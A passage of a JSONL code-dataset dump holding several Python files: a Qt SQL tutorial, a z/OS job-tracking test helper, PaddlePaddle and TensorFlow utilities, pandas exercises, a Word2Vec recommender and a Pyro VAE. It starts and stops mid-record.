\"manuel@ejemplo.com\"),\n (\"Lorena\", \"Gestora de proyectos\", \"lorena@ejemplo.com\"),\n (\"Javier\", \"Analista de datos\", \"javier@ejemplo.com\"),\n (\"Marta\", \"Experta en Python\", \"marta@ejemplo.com\")\n]\n\nconsulta = QSqlQuery()\nconsulta.prepare(\"\"\"\n INSERT INTO contactos (nombre, empleo, email) VALUES (?, ?, ?)\"\"\")\n\n# usamos .addBindValue () para insertar datos\nfor nombre, empleo, email in contactos:\n consulta.addBindValue(nombre)\n consulta.addBindValue(empleo)\n consulta.addBindValue(email)\n consulta.exec_()\n\n# Consultar registros\nconsulta.exec_(\"SELECT nombre, empleo, email FROM contactos\")\n# ponemos el cursor en el primer registro\nif consulta.first():\n print(consulta.value(\"nombre\"),\n consulta.value(\"empleo\"),\n consulta.value(\"email\"))\n# Automatizmaos el cursor hasta el final\nwhile consulta.next():\n print(consulta.value(\"nombre\"),\n consulta.value(\"empleo\"),\n consulta.value(\"email\"))\n\n\n# Cerrar conexión a la base de datos\nconexion.close()\nprint(\"¿Conexión cerrada?\", not conexion.isOpen())\n","repo_name":"hektorprofe/curso-qt-pyside-udemy","sub_path":"Proyectos/Proyecto 02/consultas_final.py","file_name":"consultas_final.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"22175538316","text":"import 
collections\n\nimport time\nfrom ptg2 import zos\nfrom ptg2.context import use_system\nfrom ptg2.zos.jes import Job, find_dd_for_exec_pgm\nfrom ptg2.zos.jesutil import StartedTask\nfrom core.BaseTest import BaseTest\n\n\nclass JobTracking(object):\n \"\"\"\n Instance class that provides services to interact with started tasks and batch jobs.\n\n Typical usage:\n\n .. code-block:: python\n\n from core.Factories import Factory\n\n nav_rtptest = Factory.create_nav_class(product_code=self.product_code, lpar=self.connection.get_lpar(),\n ssid=self.connection.get_ssid(), userid=self.connection.get_userid(),\n auto_submit=self.auto_submit, debug_mode=self.debug_mode)\n\n nav_rtptest.start_test_suite()\n\n rc, self.jobinfo = self.process_option_6(nav_rtptest)\n\n \"\"\"\n\n def __init__(self, use_lpar, jobid=None, jobname=None):\n \"\"\"\n \n :param use_lpar: Name of the Lpar. This is typically the same LPAR in which the script is executing on (Required)\n :param jobid: ID of the batch job or started task of which to get an instance for. Can use this or jobname. \n :param jobname: Name of the batch job or started task of which to get an instance for. Can use this or jobid.\n \"\"\"\n self.use_lpar = use_lpar\n self.jobid = jobid\n self.jobname = jobname\n self.job_handle = None\n self.jobfile = None\n self.jcl_log = None\n self.started_task = None\n\n self.__set_job_handle()\n\n def __set_job_handle(self):\n \"\"\"\n Set the job_handle needed for when other methods in this class are used. \n :return: \n \"\"\"\n # if instance was created with no jobid, then we must be dealing with a started task so we need to get the jobid\n if self.jobid is None:\n self.started_task = StartedTask(self.jobname, system=self.use_lpar)\n if self.started_task.is_running():\n self.jobid = self.started_task.jobid\n else:\n raise Exception(\"Started Task by name '%s' is not running on indicated lpar '%s' \"\n % (self.jobname, self.use_lpar))\n\n with use_system(self.use_lpar):\n self.job_handle = Job.get(str(self.jobid))\n\n def wait_till_job_complete(self):\n \"\"\"\n Waits for a job to complete before returning. Messages are issued by PTG2 not this method.\n :return: Nothing\n \"\"\"\n self.job_handle.wait_for_job()\n\n def update_job_status(self):\n \"\"\"\n\n :return:\n \"\"\"\n self.job_handle.update()\n\n def get_job_step_return_codes(self, list_o_steps):\n \"\"\"\n Takes a list of step names in order of execution and obtains their return codes and returns them in an\n ordered dictionary to ensure dictionary represents step execution order.\n :param list_o_steps:\n :return: dictionary of step names and return codes\n \"\"\"\n stepname_rc_dict = collections.OrderedDict()\n\n for step_name in list_o_steps:\n stepname_rc_dict[step_name] = self.job_handle.step_result(step=step_name)\n return stepname_rc_dict\n\n def get_job_message_log(self, update=False):\n \"\"\"\n If not an \"update\" request gets the initial contents of the job spool file at the time of the call. If an update\n request is being made then gets the information added to the log since the last time this method was called.\n \n :return: Sets the class instance variable for access to the information. 
\n \"\"\"\n if update:\n return self.jobfile.added_lines()\n else:\n self.jobfile = self.job_handle.get_spool_file(\"JES2.JESMSGLG\")\n\n def get_job_jcl_log(self):\n \"\"\"\n Gets the entire contents of the jobs JESJCL log\n\n :return: Sets the class instance variable for access to the information.\n \"\"\"\n self.jcl_log = self.job_handle.get_spool_file(\"JES2.JESJCL\")\n\n def print_message_log(self, log_to_print=None):\n \"\"\"\n Prints the contents of the log requested or defaults to printing the the whole updated message log from the job\n at the time this method is called.\n\n :param log_to_print: \n :return: \n \"\"\"\n if log_to_print is None:\n if self.jobfile is None:\n self.get_job_message_log()\n\n for line in self.jobfile:\n print(line)\n else:\n for line in log_to_print:\n print(line)\n\n def search_whole_message_log(self, what_to_find):\n \"\"\"\n Searches for a string in the whole output file obtained. Be careful of usage as this method can return TRUE\n if string looking for is not unique and repeats as searches the contents of the log when called from the \n beginning.\n :param what_to_find: the string to find in the message log. \n :return: True if found or False if not.\n \"\"\"\n\n if self.jobfile.contains(what_to_find):\n return True\n else:\n return False\n\n def find_print_found_message_from_log(self, what, use_log=None, print_message=True):\n \"\"\"\n Finds the string(i.e. what) given in a log file and if found prints the matching string from the log file given.\n \n This method can be useful to validate a message exists and print its contents for visualization in a whole log \n file or just the updated part since the last time the log was accessed.\n \n Example:\n \n \n \n :param what: string to be found\n :param use_log: If provided searches the log file object given otherwise searches the whole jobfile object.\n :param print_message: Defaults to True in which if the message and the 'what' matches all or part of the message\n then its printed. Set to False if no print wanted.\n :return: the matching line in the log or None if not found\n \"\"\"\n\n if use_log is None:\n for line in self.jobfile:\n if what in line:\n if print_message:\n print(line)\n return line\n return None\n else:\n for line in use_log:\n if what in line:\n if print_message:\n print(line)\n return line\n return None\n\n def find_dii_address(self, log_to_search=None):\n \"\"\"\n Finds the address where PDT DII was loaded after successful PDT collection initialization by finding the\n PDT0182 message and extracting the ADDR= value.\n\n :param log_to_search: If provided searches the log file object given otherwise searches the whole jobfile object.\n :return:\n \"\"\"\n\n if log_to_search is None:\n search_log = self.jobfile\n else:\n search_log = log_to_search\n\n diiaddr_message = self.find_print_found_message_from_log('PDT0182', use_log=search_log, print_message=False)\n\n if diiaddr_message is not None:\n addr_start = str(diiaddr_message).find('ADDR=') + 5\n addr_end = str(diiaddr_message).find('FLAG', addr_start)\n dii_address = diiaddr_message[addr_start:addr_end]\n return dii_address\n else:\n return None\n\n def get_list_dsn_for_dd(self, dd_name, pgm_name):\n \"\"\"\n Uses PTG2 method to return list of DSN for a DD concatenation.\n\n :param dd_name: name of the DD to look at (e.g. \"STEPLIB\", \"PTIPLIB\", etc...)\n :param pgm_name: name of the program (i.e. 
PGM=PXMINICC) on the EXEC.\n :return: list of dataset names.\n \"\"\"\n return find_dd_for_exec_pgm(self.jcl_log.read(), pgm_name, dd_name)\n\n def search_all_loadlibs_for_mem(self, dd_name, pgm_name, request_member):\n \"\"\"\n Finds and searches all the datasets in a DD concatenation for the member requested and returns the first loadlib\n DSN it was found in.\n\n :param dd_name: name of the DD to search. i.e. STEPLIB, PTILIB, etc...\n :param request_member: Member name to search for (e.g. PDTDIUC1, PDTDIIC2, etc...)\n :return: first loadlib DSN where member was found.\n \"\"\"\n if self.jcl_log is None:\n self.get_job_jcl_log()\n\n ds_name_list = find_dd_for_exec_pgm(self.jcl_log.read(), pgm_name, dd_name)\n\n for single_ds_name in ds_name_list:\n for dsn_member in zos.listmembers(single_ds_name):\n if dsn_member == request_member:\n return single_ds_name\n\n def find_message_with_timer(self, what, duration, print_timer=True):\n \"\"\"\n\n\n :param what:\n :param duration:\n :param print_timer:\n :return:\n \"\"\"\n\n wait_for = 5\n total_wait = 0\n\n if duration < wait_for:\n wait_for = duration\n\n while True:\n updated_log = self.get_job_message_log(update=True)\n # self.print_message_log(log_to_print=updated_log)\n if self.find_print_found_message_from_log(what, use_log=updated_log):\n return updated_log\n else:\n BaseTest.countdown_timer(wait_for, watch_timer=print_timer)\n total_wait = wait_for + total_wait\n if total_wait > duration:\n return None\n","repo_name":"prowler0305/rtp_test_framework","sub_path":"rtppy/core/JobTracking.py","file_name":"JobTracking.py","file_ext":"py","file_size_in_byte":9550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"12623975091","text":"import pathlib\nimport warnings\nfrom typing import Union, Optional, List, Tuple, Text, BinaryIO\n\nimport math\nimport matplotlib.pyplot as plt\nimport paddle\nfrom PIL import Image\n\nplt.switch_backend('agg')\n\n\ndef pad_sequence(sequences: List[paddle.Tensor],\n batch_first: bool = False,\n padding_value: float = 0.0) -> paddle.Tensor:\n r\"\"\"Pad a list of variable length Tensors with ``padding_value``\n ``pad_sequence`` stacks a list of Tensors along a new dimension,\n and pads them to equal length. For example, if the input is list of\n sequences with size ``L x *`` and if batch_first is False, and ``T x B x *``\n otherwise.\n `B` is batch size. It is equal to the number of elements in ``sequences``.\n `T` is length of the longest sequence.\n `L` is length of the sequence.\n `*` is any number of trailing dimensions, including none.\n Example:\n >>> a = paddle.ones(25, 300)\n >>> b = paddle.ones(22, 300)\n >>> c = paddle.ones(15, 300)\n >>> pad_sequence([a, b, c]).shape\n paddle.Tensor([25, 3, 300])\n Note:\n This function returns a Tensor of size ``T x B x *`` or ``B x T x *``\n where `T` is the length of the longest sequence. This function assumes\n trailing dimensions and type of all the Tensors in sequences are same.\n Args:\n sequences (list[Tensor]): list of variable length sequences.\n batch_first (bool, optional): output will be in ``B x T x *`` if True, or in\n ``T x B x *`` otherwise\n padding_value (float, optional): value for padded elements. 
Default: 0.\n Returns:\n Tensor of size ``T x B x *`` if :attr:`batch_first` is ``False``.\n Tensor of size ``B x T x *`` otherwise\n \"\"\"\n\n # assuming trailing dimensions and type of all the Tensors\n # in sequences are same and fetching those from sequences[0]\n max_size = paddle.shape(sequences[0])\n # (TODO Hui Zhang): slice not supprot `end==start`\n # trailing_dims = max_size[1:]\n trailing_dims = tuple(\n max_size[1:].numpy().tolist()) if sequences[0].ndim >= 2 else ()\n max_len = max([s.shape[0] for s in sequences])\n if batch_first:\n out_dims = (len(sequences), max_len) + trailing_dims\n else:\n out_dims = (max_len, len(sequences)) + trailing_dims\n out_tensor = paddle.full(out_dims, padding_value, sequences[0].dtype)\n for i, tensor in enumerate(sequences):\n length = tensor.shape[0]\n # use index notation to prevent duplicate references to the tensor\n if batch_first:\n # TODO (Hui Zhang): set_value op not supprot `end==start`\n # TODO (Hui Zhang): set_value op not support int16\n # TODO (Hui Zhang): set_varbase 2 rank not support [0,0,...]\n # out_tensor[i, :length, ...] = tensor\n if length != 0:\n out_tensor[i, :length] = tensor\n else:\n out_tensor[i, length] = tensor\n else:\n # TODO (Hui Zhang): set_value op not supprot `end==start`\n # out_tensor[:length, i, ...] = tensor\n if length != 0:\n out_tensor[:length, i] = tensor\n else:\n out_tensor[length, i] = tensor\n\n return out_tensor\n\n\n@paddle.no_grad()\ndef make_grid(tensor: Union[paddle.Tensor, List[paddle.Tensor]], nrow: int = 8, padding: int = 2,\n normalize: bool = False,\n value_range: Optional[Tuple[int, int]] = None, scale_each: bool = False, pad_value: int = 0,\n **kwargs) -> paddle.Tensor:\n if not (isinstance(tensor, paddle.Tensor) or (\n isinstance(tensor, list) and all(isinstance(t, paddle.Tensor) for t in tensor))):\n raise TypeError(f'tensor or list of tensors expected, got {type(tensor)}')\n\n if \"range\" in kwargs.keys():\n warning = \"range will be deprecated, please use value_range instead.\"\n warnings.warn(warning)\n value_range = kwargs[\"range\"]\n\n # if list of tensors, convert to a 4D mini-batch Tensor\n if isinstance(tensor, list):\n tensor = paddle.stack(tensor, axis=0)\n\n if tensor.dim() == 2: # single image H x W\n tensor = tensor.unsqueeze(0)\n if tensor.dim() == 3: # single image\n if tensor.shape[0] == 1: # if single-channel, convert to 3-channel\n tensor = paddle.concat((tensor, tensor, tensor), 0)\n tensor = tensor.unsqueeze(0)\n if tensor.dim() == 4 and tensor.shape[1] == 1: # single-channel images\n tensor = paddle.concat((tensor, tensor, tensor), 1)\n\n if normalize is True:\n if value_range is not None:\n assert isinstance(value_range,\n tuple), \"value_range has to be a tuple (min, max) if specified. 
min and max are numbers\"\n\n def norm_ip(img, low, high):\n img.clip(min=low, max=high)\n img = img - low\n img = img / max(high - low, 1e-5)\n\n def norm_range(t, value_range):\n if value_range is not None:\n norm_ip(t, value_range[0], value_range[1])\n else:\n norm_ip(t, float(t.min()), float(t.max()))\n\n if scale_each is True:\n for t in tensor: # loop over mini-batch dimension\n norm_range(t, value_range)\n else:\n norm_range(tensor, value_range)\n\n if tensor.shape[0] == 1:\n return tensor.squeeze(0)\n\n # make the mini-batch of images into a grid\n nmaps = tensor.shape[0]\n xmaps = min(nrow, nmaps)\n ymaps = int(math.ceil(float(nmaps) / xmaps))\n height, width = int(tensor.shape[2] + padding), int(tensor.shape[3] + padding)\n num_channels = tensor.shape[1]\n grid = paddle.full((num_channels, height * ymaps + padding, width * xmaps + padding), pad_value)\n k = 0\n for y in range(ymaps):\n for x in range(xmaps):\n if k >= nmaps:\n break\n grid[:, y * height + padding:(y + 1) * height, x * width + padding:(x + 1) * width] = tensor[k]\n k = k + 1\n return grid\n\n\n@paddle.no_grad()\ndef save_image(tensor: Union[paddle.Tensor, List[paddle.Tensor]], fp: Union[Text, pathlib.Path, BinaryIO],\n format: Optional[str] = None,\n **kwargs) -> None:\n grid = make_grid(tensor, **kwargs)\n ndarr = paddle.clip(grid * 255 + 0.5, 0, 255).cast(\"uint8\").numpy()\n im = Image.fromarray(ndarr)\n im.save(fp, format=format)\n","repo_name":"DrownFish19/cfd-gcn-paddle","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35976080289","text":"\n# =============================================================================\n# Preparing file to be used (not in datacamp tutorial)\n# =============================================================================\nimport pandas as pd\n\nfile = \"pennsylvania2012_turnout.csv\"\n\ndata = pd.read_csv(file)\n\ndf = pd.DataFrame(data) # or set ,index_col=\"count\"\n\n# Remove index\ndf.set_index(\"county\", inplace=True)\n\n# Use only the first 7 columns\ndf = df.iloc[:, :6]\n\n# =============================================================================\n# Tutorials\n# =============================================================================\n\n#1\n# Your job is to select 'Bedford' county and the 'winner' column\nprint(df.loc['Bedford', 'winner'])\n\n\n\n#2\n# Indexing and Column Rearrangement\n\n# Read in filename and set the index: election\nelection = pd.read_csv(file, index_col='county')\n\n# Create a separate dataframe with the columns ['winner', 'total', 'voters']: results\nresults = pd.DataFrame(election[['winner', 'total', 'voters']])\n\n# Print the output of results.head()\nprint(results.head())\n\n\n\n\n#3 \n\n# Slice the row labels 'Perry' to 'Potter': p_counties\np_counties = election.loc[\"Perry\":\"Potter\"]\n\n# Print the p_counties DataFrame\nprint(p_counties)\n\n# Slice the row labels 'Potter' to 'Perry' in reverse order: p_counties_rev\np_counties_rev = election.loc[\"Potter\":\"Perry\":-1]\n\n# Print the p_counties_rev DataFrame\nprint(p_counties_rev)\n\n\n\n\n#4 \n\n# Slice the columns from the starting column to 'Obama': left_columns\nleft_columns = election.iloc[:, 0:3]\n\n# Print the output of left_columns.head()\nprint(left_columns.head())\n\n# Slice the columns from 'Obama' to 'winner': middle_columns\nmiddle_columns = election.iloc[:, 2:5]\n\n# Print the output of 
middle_columns.head()\nprint(middle_columns.head())\n\n# Slice the columns from 'Romney' to the end: 'right_columns'\nright_columns = election.iloc[:, 3:]\n\n# Print the output of right_columns.head()\nprint(right_columns.head())\n\n\n\n\n\n#5 Subselecting dataframes with lists\n\n# Create the list of row labels: rows\nrows = ['Philadelphia', 'Centre', 'Fulton']\n\n# Create the list of column labels: cols\ncols = ['winner', 'Obama', 'Romney']\n\n# Create the new DataFrame: three_counties\nthree_counties = pd.DataFrame(election.loc[rows, cols])\n\n# Print the three_counties DataFrame\nprint(three_counties)\n\n\n\n\n#6 Filtering data with Boolean expression \n\n# Create the boolean array: high_turnout\nhigh_turnout = election.loc[:, 'turnout'] > 70\n\n# Filter the election DataFrame with the high_turnout array: high_turnout_df\nhigh_turnout_df = election.loc[high_turnout]\n\n# Print the high_turnout_results DataFrame\nprint(high_turnout_df)\n\n\n\n\n#7 Filtering columns using other columns\n\n# Import numpy\nimport numpy as np\n\n# Create the boolean array: too_close\ntoo_close = election['margin'] < 1\n\n# Assign np.nan to the 'winner' column where the results were too close to call\nelection.loc[too_close, 'winner'] = np.nan\n\n# Print the output of election.info()\nprint(election.info())\n\n\n\n\n#8 Filtering using NaNs\n\nfile = \"titanic.csv\"\ntitanic = pd.read_csv(file)\n\n# Select the 'age' and 'cabin' columns: df\ndf = titanic.loc[:, ['age','cabin']]\n\n# Print the shape of df\nprint(df.shape)\n\n# Drop rows in df with how='any' and print the shape\nprint(df.dropna(how='any').shape)\n\n# Drop rows in df with how='all' and print the shape\nprint(df.dropna(how='all').shape)\n\n# Drop columns in titanic with less than 1000 non-missing values\nprint(titanic.dropna(thresh=1000, axis='columns').info())\n\n\n\n\n\n","repo_name":"mattfemia/datacamp","sub_path":"manipulatingdf/extract-transform.py","file_name":"extract-transform.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2167624981","text":"\"\"\"\nDivisive normalization implementation.\n\nSee paper Normalizing the Normalizers: Comparing and Extending Network\nNormalization Schemes. Mengye Ren*, Renjie Liao*, Raquel Urtasun, Fabian H.\nSinz, Richard S. Zemel. 2016. 
https://arxiv.org/abs/1611.04520\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport tensorflow as tf\n\n\ndef div_norm_2d(\n x,\n sum_window,\n sup_window,\n strides,\n padding,\n gamma=None,\n beta=None,\n layer=None,\n eps=1.0,\n scope=None,\n name=\"dn_out\",\n return_mean=False):\n \"\"\"Applies divisive normalization on CNN feature maps.\n Collect mean and variances on x on a local window across channels.\n And apply normalization as below:\n x_ = gamma * (x - mean) / sqrt(var + eps) + beta\n https://github.com/renmengye/div-norm/blob/master/div_norm.py\n\n Args:\n x: Input tensor, [B, H, W, C].\n sum_window: Summation window size, [H_sum, W_sum].\n sup_window: Suppression window size, [H_sup, W_sup].\n gamma: Scaling parameter.\n beta: Bias parameter.\n eps: Denominator bias.\n return_mean: Whether to also return the computed mean.\n\n Returns:\n normed: Divisive-normalized variable.\n mean: Mean used for normalization (optional).\n \"\"\"\n if not isinstance(sum_window, list):\n sum_window = list(np.repeat(sum_window, 2))\n if not isinstance(sup_window, list):\n sup_window = list(np.repeat(sup_window, 2))\n\n if scope is None:\n scope = '%s_%s' % (layer['names'][0], layer['normalization'][0])\n with tf.variable_scope(scope):\n w_sum = tf.ones(sum_window + [1, 1]) / np.prod(np.array(sum_window))\n w_sup = tf.ones(sup_window + [1, 1]) / np.prod(np.array(sup_window))\n x_mean = tf.reduce_mean(x, [3], keep_dims=True)\n x_mean = tf.nn.conv2d(\n x_mean,\n w_sum,\n strides=strides,\n padding=padding)\n normed = x - x_mean\n x2 = tf.square(normed)\n x2_mean = tf.reduce_mean(x2, [3], keep_dims=True)\n x2_mean = tf.nn.conv2d(\n x2_mean,\n w_sup,\n strides=strides,\n padding=padding)\n denom = tf.sqrt(x2_mean + eps)\n normed = normed / denom\n if gamma is None:\n gamma = tf.get_variable(\n name='%s_%s' % ('gamma', scope),\n initializer=1.)\n normed *= gamma\n if beta is not None:\n beta = tf.get_variable(\n name='%s_%s' % ('beta', scope),\n initializer=0.)\n normed += beta\n normed = tf.identity(normed, name='%s_%s' % (scope, name))\n if return_mean:\n return normed, x_mean\n else:\n return normed\n\n\ndef div_norm_1d(\n x,\n sum_window,\n sup_window,\n strides,\n padding,\n gamma=None,\n beta=None,\n layer=None,\n eps=1.0,\n scope='dn',\n name=\"dn_out\",\n return_mean=False):\n \"\"\"Applies divisive normalization on fully connected layers.\n Collect mean and variances on x on a local window. 
And apply\n    normalization as below:\n    x_ = gamma * (x - mean) / sqrt(var + eps) + beta\n\n    Args:\n      x: Input tensor, [B, D].\n      sum_window: Summation window size, W_sum.\n      sup_window: Suppression window size, W_sup.\n      gamma: Scaling parameter.\n      beta: Bias parameter.\n      eps: Denominator bias.\n      return_mean: Whether to also return the computed mean.\n\n    Returns:\n      normed: Divisive-normalized variable.\n      mean: Mean used for normalization (optional).\n    \"\"\"\n\n    if scope is None:\n        scope = '%s_%s' % (layer['names'][0], layer['normalization'][0])\n    with tf.variable_scope(scope):\n        x = tf.expand_dims(x, 2)\n        w_sum = tf.ones([sum_window, 1, 1], dtype='float') / float(sum_window)\n        w_sup = tf.ones([sup_window, 1, 1], dtype='float') / float(sup_window)\n        mean = tf.nn.conv1d(x, w_sum, stride=strides, padding=padding)\n        x_mean = x - mean\n        x2 = tf.square(x_mean)\n        var = tf.nn.conv1d(x2, w_sup, stride=strides, padding=padding)\n        normed = (x - mean) / tf.sqrt(eps + var)\n        normed = tf.squeeze(normed, [2])\n        mean = tf.squeeze(mean, [2])\n        # Create default affine parameters only when none were supplied, then always apply them.\n        if gamma is None:\n            gamma = tf.get_variable(\n                name='%s_%s' % ('gamma', scope),\n                initializer=1.)\n        normed *= gamma\n        if beta is None:\n            beta = tf.get_variable(\n                name='%s_%s' % ('beta', scope),\n                initializer=0.)\n        normed += beta\n        normed = tf.identity(normed, name='%s_%s' % (scope, name))\n    if return_mean:\n        return normed, mean\n    else:\n        return normed\n","repo_name":"psailamul/contextual_circuit_bp","sub_path":"models/layers/normalization_functions/div_norm.py","file_name":"div_norm.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34715274596","text":"import tkinter\n\nfrom PIL import Image, ImageTk\nroot=tkinter.Tk()\nroot.geometry(\"1130x640\")\n\ntest=tkinter.PhotoImage(file='cricket2.png')\nlabel1=tkinter.Button(image=test)\nlabel1.place(x=5,y=5,height=100,width=100)\nroot.mainloop()","repo_name":"Ruwayed/Cricket-Scoreboard-using-python-customtkinter","sub_path":"pic.py","file_name":"pic.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18596366890","text":"import pandas as pd\nfrom gensim.models import Word2Vec\nfrom model.var_from_cfg import embedd_model_path\n\nclass ModelPred():\n    def __init__(self):\n        \"\"\"\n        Initialize the predictor and load the saved embedding model\n        \"\"\"\n        self.model = self.load_model()\n\n\n    def load_model(self):\n        \"\"\"\n        Load the trained Word2Vec model from embedd.bin (embedd_model_path)\n        \n        @return The loaded Word2Vec model\n        \"\"\"\n\n        # Load saved model\n        model = Word2Vec.load(embedd_model_path)\n        return model\n\n\n    def predict(self, user_id):\n        \"\"\"\n        Predicts most similar books for a user. 
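Under the hood this queries the trained Word2Vec embedding via wv.most_similar, which returns the ten nearest neighbours by default. 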
\n \n @param user_id - ID of user to predict\n \n @return DataFrame with book title and score for each book that is\n \"\"\"\n \n result = self.model.wv.most_similar(user_id)\n\n result_df = pd.DataFrame(result)\n result_df.columns = ['Book-Title', 'Score']\n\n print(result_df)\n\n return result_df\n\n\nif __name__ == '__main__':\n model_pred = ModelPred()\n model_pred.predict(1)\n\n","repo_name":"TranQuocViet236/RS","sub_path":"model/model_prediction.py","file_name":"model_prediction.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41143075200","text":"import torch\nimport pyro\nimport numpy as np\nfrom torch.nn import Module\nfrom torch.nn.functional import one_hot\nfrom networks import Decoder, Encoder\nfrom torch import tensor\nfrom pyro.distributions import OneHotCategorical, Normal, Bernoulli\nimport matplotlib.pyplot as plt\n\ndef ind_from_att(color, shape, scale, orientation, posX, posY):\n if type(color) != int:\n color = int(color)\n if type(shape) != int:\n shape = int(shape)\n if type(scale) != int:\n scale = int(scale)\n if type(orientation) != int:\n orientation = int(orientation)\n if type(posX) != int:\n posX = int(posX)\n if type(posY) != int:\n posY = int(posY)\n return (color)*3*6*40*32*32 + (shape )*6*40*32*32 + (scale)*40*32*32 + (orientation)*32*32 + (posX)*32 + posY \n\ndef dummy_from_label(label):\n sizes = [1, 3, 6, 40, 32, 32]\n dummy = []\n for i, length in enumerate(sizes):\n dummy.append(one_hot(tensor(label[:, i], dtype = torch.int64), int(length)))\n return torch.cat(dummy, -1).to(torch.float32)\n\ndef label_from_dummy(dummy):\n label = []\n label.append(0)\n label.append(dummy[1:4].max(0)[1])\n label.append(dummy[4:10].max(0)[1])\n label.append(dummy[10:50].max(0)[1])\n label.append(dummy[50:82].max(0)[1])\n label.append(dummy[82:114].max(0)[1])\n return label\n\nclass VAE(Module):\n '''\n Class that define the posterior distribution q(z|x) as the model \n with the decoder and the prior distribution q(x|z) as the guide \n using the encoder.\n \n Inputs: \n :pimg_dim: dimension of image vector\n :label_dim: dimension of label vector\n :latent_dim: dimension of Z space, output\n '''\n def __init__(self, latents_sizes, latents_names, img_dim = 4096, label_dim = 114, latent_dim = 200, use_CUDA = False):\n super(VAE, self).__init__()\n #creating networks\n self.encoder = Encoder(img_dim, label_dim, latent_dim)\n self.decoder = Decoder(img_dim, label_dim, latent_dim)\n self.img_dim = img_dim\n self.label_dim = label_dim\n self.latent_dim = latent_dim\n self.latents_sizes = latents_sizes\n self.latents_names = latents_names\n if use_CUDA:\n self.cuda()\n self.use_CUDA = use_CUDA\n \n def label_variable(self, label):\n new_label = []\n options = {'device': label.device, 'dtype': label.dtype}\n for i, length in enumerate(self.latents_sizes):\n prior = torch.ones(label.shape[0], length, **options) / (1.0 *length)\n new_label.append(pyro.sample(\"label_\" + str(self.latents_names[i]), \n OneHotCategorical(prior), \n obs = one_hot(tensor(label[:, i], dtype = torch.int64), int(length))))\n new_label = torch.cat(new_label, -1)\n return new_label.to(torch.float32).to(label.device)\n\n def model(self, img, label):\n pyro.module(\"decoder\", self.decoder)\n options = {'device': img.device, 'dtype': img.dtype}\n with pyro.plate(\"data\", img.shape[0]):\n z_mean = torch.zeros(img.shape[0], self.latent_dim, **options)\n z_variance = torch.ones(img.shape[0], 
self.latent_dim, **options)\n z_sample = pyro.sample(\"latent\", Normal(z_mean, z_variance).to_event(1))\n image = self.decoder.forward(z_sample, self.label_variable(label))\n pyro.sample(\"obs\", Bernoulli(image).to_event(1), obs = img)\n\n\n def guide(self, img, label):\n pyro.module(\"encoder\", self.encoder)\n with pyro.plate(\"data\", img.shape[0]):\n z_mean, z_variance = self.encoder.forward(img, self.label_variable(label))\n pyro.sample(\"latent\", Normal(z_mean, z_variance).to_event(1))\n \n def run_img(self, img, label, num = 1):\n label = label.reshape(1, -6)\n dummy_label = dummy_from_label(label)\n img = tensor(img.reshape(-1, 4096)).to(torch.float32)\n mean, var = self.encoder.forward(img, dummy_label)\n\n fig = plt.figure(figsize = (4, num*5))\n plots = []\n plots.append(plt.subplot(num+1, 1, 1))\n plots[0].set_title('Original image')\n plt.imshow(img.reshape(64, 64))\n \n for i in range(1, num):\n z_sample = Normal(mean, var).sample()\n vae_img = self.decoder.forward(z_sample, dummy_label)\n plots.append(plt.subplot(num+1, 1, i+1))\n plots[-1].set_title(str(i) +' - sample of latent space')\n plt.imshow(vae_img.detach().numpy().reshape(64, 64))\n plt.show()\n\n def change_attribute(self, img, label, attribute = 1):\n print('Attribute changed was ' + str(self.latents_names[attribute]))\n label = label.reshape(1, -6)\n new_label = np.copy(label)\n while (new_label == label).all():\n val = np.random.choice(list(range(self.latents_sizes[attribute])))\n new_label[0, attribute] = val\n dummy_label = dummy_from_label(label)\n new_dummy = dummy_from_label(new_label)\n img = tensor(img.reshape(-1, 4096)).to(torch.float32)\n mean, var = self.encoder.forward(img, dummy_label)\n \n fig = plt.figure(figsize = (4, 15))\n plots = []\n \n plots.append(plt.subplot(3, 1, 1))\n plots[0].set_title('Original image')\n plt.imshow(img.reshape(64, 64))\n \n z_sample = Normal(mean, var).sample()\n vae_img = self.decoder.forward(z_sample, dummy_label)\n plots.append(plt.subplot(3, 1, 2))\n plots[1].set_title('Sample with original attribute')\n plt.imshow(vae_img.detach().numpy().reshape(64, 64))\n \n z_sample = Normal(mean, var).sample()\n vae_img = self.decoder.forward(z_sample, new_dummy)\n plots.append(plt.subplot(3, 1, 3))\n plots[2].set_title('Sample with changed attribute')\n plt.imshow(vae_img.detach().numpy().reshape(64, 64))\n plt.show()\n\n","repo_name":"GiovaniValdrighi/inferencia_causal","sub_path":"vae/vae_build.py","file_name":"vae_build.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32842300161","text":"import random\nimport matplotlib.pyplot as plt\nimport pickle \nimport os\nimport json\nimport pandas as pd\nfrom collections import Counter\nimport pdb\n\nif os.path.exists(\"../data/pico_dict.pickle\"):\n with open(\"../data/pico_dict.pickle\", \"rb\") as f:\n dataset = pickle.load(f)\n\nrandom.seed(50)\n# Shuffle and split the dataset into train_data, valid_data, and test_data\nclass_list = list(dataset.keys())\n# strings_to_remove = ['iv-cont-q1', 'cv-cont-q1', 'iv-cont-q3', 'cv-cont-q3']\n# class_list = list(filter(lambda x: x not in strings_to_remove, class_list))\nrandom.shuffle(class_list)\nnum_classes = len(class_list)\n\ntrain_classes = class_list[:num_classes // 2]\nvalid_classes = class_list[num_classes // 2:(num_classes * 3) // 4]\ntest_classes = class_list[(num_classes * 3) // 4:]\n\ntrain_data = {k: dataset[k] for k in train_classes}\nvalid_data = {k: dataset[k] for 
